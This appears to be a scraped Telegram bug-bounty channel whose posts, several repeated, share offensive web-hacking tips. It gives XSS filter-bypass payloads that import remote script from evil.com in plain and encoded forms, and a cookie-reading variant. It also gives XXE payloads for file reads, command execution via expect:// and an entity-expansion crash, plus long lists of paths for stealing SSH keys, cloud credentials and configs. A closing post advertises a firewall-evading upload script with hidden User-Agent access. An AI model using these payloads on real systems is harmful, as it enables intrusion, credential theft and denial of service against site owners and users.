Hello Hunters,
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!
Take a look at these screenshots — the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!
This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.
Stay sharp and hunt smarter!
Follow me👉🏼 DarkShadow
#bugbountytips@brutsecurity #ssrf
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!
Take a look at these screenshots — the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!
This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.
Stay sharp and hunt smarter!
Follow me👉🏼 DarkShadow
#bugbountytips@brutsecurity #ssrf
🗿12👍10❤9🔥7
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔16👍9🔥6
Hey Hunters,
DarkShadow here—dropping a quick tip for your next XSS hunt!
Tired of firewalls blocking alert(), prompt(), or confirm()? Use
Try these sneaky XSS payloads:
Blind Payloads:
Encoded Variants:
Evil Payload.js Example:
Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.
Want a full XSS WAF Bypass Cheat Sheet? Let me know in the comments—I'll cook one up!
Follow me 👉🏼 DarkShadow
#bugbountytips #xss #wafbypass
DarkShadow here—dropping a quick tip for your next XSS hunt!
Tired of firewalls blocking alert(), prompt(), or confirm()? Use
import() to level up your payload game.Try these sneaky XSS payloads:
import('data:text/javascript;base64,YWxlcnQoJ1hTUyEnKQ==')
// Base64 → alert('XSS!')
import('data:text/javascript,%61lert(document.cookie)')
// %61 = 'a'
Blind Payloads:
<script type="module">import('https://evil.com/payload.js');</script>
<img src=x onerror="import('https://evil.com/payload.js')">
<svg/onload="import('https://evil.com/payload.js')">
(()=>{import('https://evil.com/payload.js')})()
import(/*trick*/'https://evil.com/payload.js')
Encoded Variants:
\u0069\u006d\u0070\u006f\u0072\u0074('https://evil.com/payload.js')
// import as Unicode encoding
<script>import(String.fromCharCode( 104,116,116,112,115,58,47,47,101,118,105,108,46,99,111,109,47,112,97,121,46,106,115));</script>
// https://evil.com/pay.js ASCII decimal encoding
Evil Payload.js Example:
export function pwn() {
alert('DarkShadow is here!');
}
Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.
Want a full XSS WAF Bypass Cheat Sheet? Let me know in the comments—I'll cook one up!
Follow me 👉🏼 DarkShadow
#bugbountytips #xss #wafbypass
🔥22👍8❤5🤝1
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0–9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25👍9🤝1🫡1
Hey everyone!
Sorry for not being active lately—been dealing with some health stuff. I’ll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.
Stay tuned and take care!
— Saumadip | Brut Security
Sorry for not being active lately—been dealing with some health stuff. I’ll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.
Stay tuned and take care!
— Saumadip | Brut Security
❤14👍3
🔥XXE to Remote Code Execution (RCE) – Real-World Attack Chain⚡
Hey Hunters,
DarkShadow here—dropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability 😏
1. Basic XXE Payload (Test Injection)
2. RCE via expect:// PHP Wrapper (if enabled)
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
🛑Pro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
3. Bash History Abuse
5. Custom Internal Recon via /proc Files
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love ❤️
Don't forget to follow me 👉🏼 DarkShadow
#bugbountytips #xxe
Hey Hunters,
DarkShadow here—dropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability 😏
1. Basic XXE Payload (Test Injection)
<?xml version="1.0"?>If the response contains /etc/passwd, the app is XXE vulnerable.
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>
2. RCE via expect:// PHP Wrapper (if enabled)
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
Useful Paths to Check:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
/etc/ssh/ssh_config
/var/backups/
/proc/self/environ (for creds or keys in memory)
🛑Pro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
Also check:2. Dump Configs for DB Creds or Secrets
/home/www-data/.aws/credentials
/proc/self/environ (might expose AWS keys, tokens)
Also check:
config.php
.env
db.php
settings.php
wp-config.php (WordPress)
phpmyadmin/config.inc.php (phpmyadmin)
administrator/.env (joomla)
config/services.yaml (Symfony Framework)
app/config.js, app/config.json (nodejs)
settings.py, config.py (Python / Django / Flask)
application.properties, application.yml, web.xml (Java / Spring Boot / JSP Apps)
database.yml (Ruby on Rails)
3. Bash History Abuse
Also check:4. Read Logs for Token Harvesting
.bash_history
Sometimes contains:
MySQL login
Admin tools
SSH commands
Clear-text passwords
Web Server Logs:
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
PHP / App-Specific Logs:
/var/log/php_errors.log
/var/log/php8.1-fpm.log
/var/log/php7.4-fpm.log
/var/log/php5-fpm.log
/var/log/php-fpm/www-error.log
Laravel / Symfony / Framework Logs:
storage/logs/laravel.log
/var/www/html/storage/logs/laravel.log
/var/www/html/app/storage/logs/laravel.log
var/log/dev.log (Symfony)
app/logs/dev.log
Authentication / Session Logs
/var/log/auth.log
/var/log/secure
/var/log/faillog
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
System Logs (May Contain Leaks or Stack Traces):
/var/log/syslog
/var/log/messages
/var/log/dmesg
/var/log/kern.log
Database Logs (If Exposed):
/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mariadb/mariadb.log
5. Custom Internal Recon via /proc Files
Also check:
/proc/self/cmdline
/proc/self/fd/
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love ❤️
Don't forget to follow me 👉🏼 DarkShadow
#bugbountytips #xxe
👍19❤15🔥7🤨1🤝1
It’s lightweight, fast, and helps turn raw recon into insights.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥6👍4
Good Morning Everyone 💥 💥 💥 💥 💥
So how's everything going on?🔥 👀
So how's everything going on?
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14🔥8
Hey Hunters,
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.
So, I’ve built a next-level, compact script that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
Wanna try it out? drop a comment and let me know. And of course, follow me on X → DarkShadow
#wafbypass
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.
So, I’ve built a next-level, compact script that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
No password needed.
It uses a unique auth mechanism based on the User-Agent header—no login form, no cookies, nothing else. If your User-Agent matches, you’re in. If not, the script won’t even respond.
Wanna try it out? drop a comment and let me know. And of course, follow me on X → DarkShadow
#wafbypass
😱8👍7❤6🔥4🐳1🗿1